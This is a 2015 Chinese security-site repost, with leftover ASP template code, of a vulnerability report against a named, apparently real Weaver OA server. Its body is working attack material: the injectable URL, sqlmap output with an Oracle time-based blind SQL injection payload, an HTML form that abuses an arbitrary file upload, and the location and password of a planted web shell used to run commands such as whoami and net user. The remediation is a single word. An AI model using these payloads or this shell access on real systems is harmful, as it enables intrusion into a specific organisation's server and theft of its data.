<% dim ModuleName,InfoID,ChannelShortName,CorrelativeArticle,InstallDir,ChannelDir,Keyword,PageTitle,ArticleIntro,Articlecontent Keyword=stripHTML("魔方,魔方某系统,SQL注入,getshell") PageTitle=stripHTML("魔方某系统存在SQL注入,并可getshell") ArticleIntro=stripHTML("魔方某系统存在SQL注入,并可getshell") Articlecontent=stripHTML("的泛微的系统  http://oa.52mf.cn    注入点http://oa.52mf.cn/homepage/LoginHomepage.jsp?hpi…") ModuleName = stripHTML("exploits") InfoID = stripHTML("211410") ChannelShortName=stripHTML("漏洞") InstallDir=stripHTML("http://www.77169.org/") ChannelDir=stripHTML("exploits") %> 魔方某系统存在SQL注入,并可getshell - 华盟网 - http://www.77169.org
您现在的位置: 华盟网 >> 漏洞 >> 网站漏洞 >> 正文

[组图]魔方某系统存在SQL注入,并可getshell

2015/9/16 作者:getshell 来源: 网络收集
导读 <% if len(ArticleIntro)<3 then Response.Write Articlecontent 'Response.Write "Articlecontent" else Response.Write ArticleIntro 'Response.Write "ArticleIntro" end if %>

  的泛微的系统

  http://oa.52mf.cn

  

  注入http://oa.52mf.cn/homepage/LoginHomepage.jsp?hpid=52*&isfromportal=1

custom injection marking character ('*') found in option '-u'. Do you want to pr
ocess it? [Y/n/q] y
[10:51:27] [INFO] resuming back-end DBMS 'oracle'
[10:51:27] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: URI
Parameter: #1*
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: http://oa.52mf.cn:80/homepage/LoginHomepage.jsp?hpid=52 AND 6364=DB
MS_PIPE.RECEIVE_MESSAGE(CHR(71)||CHR(90)||CHR(106)||CHR(82),5)&isfromportal=1
---
available databases [1]:
[*] ECOLOGY

  利用任意上传可以getshell

  构造表单

<form method='post' action='http://oa.52mf.cn/tools/SWFUpload/upload.jsp'  enctype="multipart/form-data" >

<input type="file" id="file" name="test" style="height:20px;BORDER: #8F908B 1px solid;"/>

<button type=submit value="getshell">getshell</button> </form>

  访问http://oa.52mf.cn/nullacc.jsp 密码023

  执行命令

  http://oa.52mf.cn/nullacc.jsp?pwd=023&cmd=ipconfig

      

  net user

      

  whoami

      

  解决方案:

  过滤



  • 上一篇漏洞:

  • 下一篇漏洞: 没有了